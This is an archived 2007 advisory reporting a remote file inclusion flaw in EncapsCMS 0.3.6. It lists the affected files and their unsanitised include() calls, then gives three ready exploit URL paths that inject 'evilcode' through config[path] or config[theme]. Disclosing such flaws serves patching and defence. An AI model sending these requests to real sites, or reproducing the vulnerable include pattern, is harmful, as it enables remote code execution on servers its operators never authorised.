Security Advisory: EncapsCMS 0.3.6 (common_foot.php) Remote File Include

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  phpBB2 MODificat (phpbb_root_path)
Remote File Include Exploit
  MyNews 4.2.2 <= Remote File Include Vulnerability
  CascadianFAQ <= 4.1 (index.php) Remote Blind SQL Injection Vulnerability
  PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability

From: trzindan_(at)_hotmail.fr <trzindan_(at)_hotmail.fr>
Date: 30.01.2007
Subject: EncapsCMS 0.3.6 (common_foot.php) Remote File Include

########################################################################
#
# EncapsCMS 0.3.6 (common_foot.php) Remote File Include
# Download Source : http://scripts.ringsworld.com/content-management/encapscms-0.3.6.zip
#
# Found By : Tr_ZiNDaN
# Location : TurkeY -- #trzindan (at) hotmail (dot) fr [email concealed]
########################################################################

file ;
common_foot.php
blogs.php
admin/gallery_head.php

########################################################################

bugs ;

include($config['path']."bloks.html");
include($config['theme'].'gallery_navi.html');
include($config['path']."idx_foot.html");

########################################################################
exp;
/encapscms-0.3.6/common_foot.php?config[path]=evilcode?
/encapscms-0.3.6/blogs.php?config[path]=evilcode?
/encapscms-0.3.6/admin/gallery_head.php?config[theme]=evilcode?

########################################################################

Thanks;
Crackers_Child,str0ke,EL_MuHaMMeD,CyberWolf,EntRika,Blackwolf,,KurtEfendy

Canberx,Chaos,C0ld_Z3r0,Arslan,H0tturk,Sehzade,XYU,Paradox_ MusLim Hackers

########################################################################

T3k T4b4nC4 2oo7~

test server